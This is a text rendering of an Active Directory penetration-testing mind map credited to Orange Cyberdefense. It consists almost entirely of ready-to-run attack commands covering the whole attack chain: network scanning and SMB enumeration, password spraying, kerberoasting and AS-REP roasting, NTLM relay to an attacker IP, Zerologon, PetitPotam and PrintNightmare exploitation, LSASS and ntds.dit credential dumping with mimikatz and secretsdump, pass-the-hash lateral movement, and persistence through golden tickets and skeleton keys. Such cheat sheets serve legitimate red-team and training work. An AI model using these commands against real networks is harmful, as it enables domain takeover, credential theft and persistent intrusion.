Pentesting Active Directory

The document discusses different techniques for pivoting to other computers without credentials, such as psexec.py, wmiexec.py, and atexec.py. It also covers dumping LSASS memory to extract credentials and using those credentials for privilege escalation on remote systems over SMB.

Pentesting active directory (mind map)
Kindly provided by Orange Cyberdefense ;-) mayfly (@M4yFly)
Some commands can break stuff, be sure to know what you are doing!
Please find legend below.
...

Scan Network
  nmap -sP -p <ip> # ping scan
  nmap -PN -sV --top-ports 50 --open <ip> # quick scan
  nmap -PN --script smb-vuln* -p139,445 <ip> # search smb vuln
  nmap -PN -sC -sV <ip> # classic scan
  nmap -PN -sC -sV -p- <ip> # full scan
  nmap -sU -sC -sV <ip> # udp scan
  cme smb <ip_range> # enumerate smb hosts

find vulnerable host / classic quick compromise methods
  java rmi: exploit/multi/misc/java_rmi_server
  ms17-010: exploit/windows/smb/ms17_010_eternalblue
  tomcat/jboss manager: auxiliary/scanner/http/tomcat_enum ; exploit/multi/http/tomcat_mgr_deploy
  java serialized port: ysoserial
  vulnerable product with cve: searchsploit
  SMBGhost CVE-2020-0796
  CVE-2021-36934 (HiveNightmare/SeriousSAM)
  proxylogon
  proxyshell

no credentials / Low hanging fruit
  find AD IP
    nmcli dev show eth0 # show domain name & dns
    nslookup -type=SRV _ldap._tcp.dc._msdcs.<DOMAIN>
  zone transfer
    dig axfr <domain_name> @<name_server>
  null session / anonymous access / List guest access on smb
    enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
    smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
    smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
    cme smb <ip> -u '' -p '' # enumerate null session
    cme smb <ip> -u 'a' -p '' # enumerate anonymous access
  Enumerate ldap
    nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>
    ldapsearch -x -h <ip> -s base
  Find user list
    enum4linux -U <dc-ip> | grep 'user:'
    crackmapexec smb <ip> -u <user> -p '<password>' --users
    nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
    rpcclient $> lookupnames <name>
    wmic useraccount get name,sid
    OSINT - enumerate username on internet
  Got valid username / got username but no password
    Password spray
      cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # test user=password
      cme smb <dc-ip> -u user.txt -p password.txt # multiple test (careful of lockout policy)
    ASREPRoast
      python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
      Rubeus asreproast /format:hashcat
      Get ASREPRoastable users:
        Get-DomainUser -PreauthNotRequired -Properties SamAccountName
        MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
  unsigned SMB / find smb not signed
    nmap -Pn -sS -T4 --open --script smb-security-mode -p445 ADDRESS/MASK
    FindSMB2UPTime.py <ip>
    cme smb $hosts --gen-relay-list relay.txt
    use exploit/windows/smb/smb_relay
    MS08-068: use exploit/windows/smb/smb_relay # windows200 / windows server2008
  relay/poisoning (no smb signing || ipv6 enabled || adcs)
    responder -i eth0
    mitm6 -d <domain>
    relay:
      responder -I eth0 # disable smb & http
      ntlmrelayx.py -tf targets.txt
      mitm6 -i eth0 -d <domain>
      ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
      ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
      ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>
      ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
      getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
    privexchange: python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>
    ADCS / adcs:
      ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
      Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
  zerologon
    python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
    secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator"
    secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>
    python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>
  PetitPotam
    PetitPotam.py -d <domain> <listener_ip> <target_ip>
  PrintNightmare
    CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'

Got one account on the domain / user found
  bloodhound / Bloodhound
    bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
  powerview / pywerview / PowerView
  Get all users
    GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
  enumerate SMB share
    cme smb <ip> -u <user> -p <password> --shares
  Get password policy
    enum4linux -u 'username' -p 'password' -P <IP>
    crackmapexec <IP> -u 'user' -p 'password' --pass-pol
  enum dns
    dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>
  kerberoasting (Get hash)
    GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
    Rubeus kerberoast
    Get kerberoastable users:
      Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
      MATCH (u:User {hasspn:true}) RETURN u
      MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
  MS14-068
    auxiliary/admin/kerberos/ms14_068_kerberos_checksum
    goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
    kerberos::ptc "<ticket>"
  Printers spooler service abuse
    rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
    printerbug.py '<domain>/<username>:<password>'@<Printer IP> <RESPONDERIP>
  AD acl abuse
    aclpwn.py
    GenericAll on User
    GenericAll on Group
    GenericAll / GenericWrite / Write on Computer
    WriteProperty on Group
    Self (Self-Membership) on Group
    WriteProperty (Self-Membership)
    ForceChangePassword
    WriteOwner on Group
    GenericWrite on User
    WriteDACL + WriteOwner
    GPO Delegation
  MSSQL Trusted Links
    use exploit/windows/mssql/mssql_linkcrawler
  sccm
    CMPivot
  WSUSpect
    WSUSpendu.ps1 # need compromised WSUS server
  get laps passwords
    Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
    foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
  dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user
    sc \\DNSServer stop dns
    sc \\DNSServer start dns
  MS14-025
    use scanner/smb/smb_enum_gpp
    findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
  database credentials
    use admin/mssql/mssql_enum_sql_logins
  search password files
    findstr /si 'password' *.txt *.xml *.docx
  search stored password
    lazagne.exe all
  shadow copies
    diskshadow list shadows all
    mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
  dpapi extract

hash found / user & hash found -> cracking hash / crack hash
  LM
    john --format=lm hash.txt
    hashcat -m 3000 -a 3 hash.txt
  NTLM
    john --format=nt hash.txt
    hashcat -m 1000 -a 3 hash.txt
  NTLMv1
    john --format=netntlm hash.txt
    hashcat -m 5500 -a 3 hash.txt
  NTLMv2
    john --format=netntlmv2 hash.txt
    hashcat -m 5600 -a 0 hash.txt rockyou.txt
  Kerberos 5 TGS
    john spn.txt --format=krb5tgs --wordlist=rockyou.txt
    hashcat -m 13100 -a 0 spn.txt rockyou.txt
  Kerberos ASREP
    hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt

Low access -> Privilege escalation
  winpeas.exe
  Juicy Potato / Lovely Potato
  PrintSpoofer
  RoguePotato
  token manipulation
    .\incognito.exe list_tokens -u
    .\incognito.exe execute -c "<domain>\<user>" powershell.exe
    use incognito
    impersonate_token <domain>\\<user>

Administrator access (got an admin access?)
  get credentials
    mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
    cme smb <ip_range> -u <user> -p <password> -M lsassy
    cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds
    post/windows/gather/smart_hashdump
    hashdump
    LSA as a Protected Process:
      PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
      mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" # with mimidriver.sys
  Get tickets
    privilege::debug sekurlsa::tickets /export
    Rubeus dump /service:krbtgt /nowrap
    Rubeus dump /luid:0xdeadbeef /nowrap
  Lateral move / Pivoting to other computers (got administrator access on one machine)
    pass the hash
      psexec.py -hashes ":<hash>" <user>@<ip>
      wmiexec.py -hashes ":<hash>" <user>@<ip>
      atexec.py -hashes ":<hash>" <user>@<ip> "command"
      evil-winrm -i <ip>/<domain> -u <user> -H <hash>
      xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
    overpass the hash / pass the key (PTK)
      python getTGT.py <domain>/<user> -hashes :<hashes>
      export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
      python psexec.py <domain>/<user>@<ip> -k -no-pass
      Rubeus asktgt /user:victim /rc4:<rc4value>
      Rubeus createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe]
      Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
      Rubeus ptt /ticket:<ticket>
  Unconstrained delegation (Get unconstrained delegation machines)
    Get-NetComputer -Unconstrained
    Get-DomainComputer -Unconstrained -Properties DnsHostName
    MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
    MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
  Constrained delegation (Get constrained delegation machines)
    Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
    MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
  Resource-Based Constrained Delegation
    MATCH (u:User {owned:true}), (c:Computer {name: "<MYTARGET.FQDN>"}), p=shortestPath((u)-[*1..]->(c)) RETURN p
  dcsync
    lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts

Domain admin
  dump ntds.dit
    crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> --ntds
    secretsdump.py '<domain>/<user>:<pass>'@<ip>
    secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
    ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
    windows/gather/credentials/domain_hashdump
  Persistence
    net group "domain admins" myuser /add /domain
    Golden ticket
      ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
    Silver Ticket
    DSRM
      PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
    Skeleton Key
      mimikatz "privilege::debug" "misc::skeleton" "exit"
    Custom SSP
      mimikatz "privilege::debug" "misc::memssp" "exit"
      C:\Windows\System32\kiwissp.log
  Trust relationship
    mimikatz lsadump::trust
    "lsadump::trust /patch"
    "lsadump::lsa /patch"
    Child Domain to Forest Compromise - SID Hijacking
      Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData| select objectsid
      kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
    Forest to Forest Compromise - Trust Ticket
      "kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:<golden_ticket_path>"
      .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
    Breaking forest trust
      printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dcsync